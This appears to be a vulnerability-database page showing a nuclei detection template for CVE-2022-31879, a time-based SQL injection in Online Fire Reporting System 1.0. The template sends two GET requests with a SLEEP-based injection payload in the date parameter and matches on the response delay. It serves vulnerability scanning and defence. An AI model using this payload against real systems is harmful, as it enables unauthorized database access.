Lucene search
K

Online Fire Reporting System v1.0 - SQL injection

🗓️ 05 Jun 2023 07:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via the date parameter. Successful exploitation could lead to unauthorized access, data leakage, or data manipulation. Remediation requires input validation and sanitization

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-31879
26 Jul 202213:15
attackerkb
Circl
CVE-2022-31879
26 Jul 202216:34
circl
CNNVD
Online Fire Reporting System SQL注入漏洞
26 Jul 202200:00
cnnvd
CVE
CVE-2022-31879
26 Jul 202212:57
cve
Cvelist
CVE-2022-31879
26 Jul 202212:57
cvelist
EUVD
EUVD-2022-53214
3 Oct 202520:07
euvd
NVD
CVE-2022-31879
26 Jul 202213:15
nvd
OSV
CVE-2022-31879
26 Jul 202213:15
osv
Prion
Sql injection
26 Jul 202213:15
prion
Positive Technologies
PT-2022-20969 · Unknown · Online Fire Reporting System
26 Jul 202200:00
ptsecurity
Rows per page
id: CVE-2022-31879

info:
  name: Online Fire Reporting System v1.0 - SQL injection
  author: theamanrawat,j4vaovo
  severity: high
  description: |
    Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting
    - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31879
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-31879
    cwe-id: CWE-89
    epss-score: 0.05371
    epss-percentile: 0.93099
    cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: online_fire_reporting_system_project
    product: online_fire_reporting_system
  tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project

http:
  - raw:
      - |
        @timeout: 15s
        GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 15s
        GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200'
          - 'duration_2 - duration_1 >= 7'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "Dashboard")'
        condition: and
# digest: 4b0a00483046022100813a074dda781c0eac1c568a26f0ba914c29ec80c80fa7735148e7af57dc3cd0022100ec9b4331c556899825042e75cb937f5db6dd4b0c2a8166e17e3d466a2ac11256:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation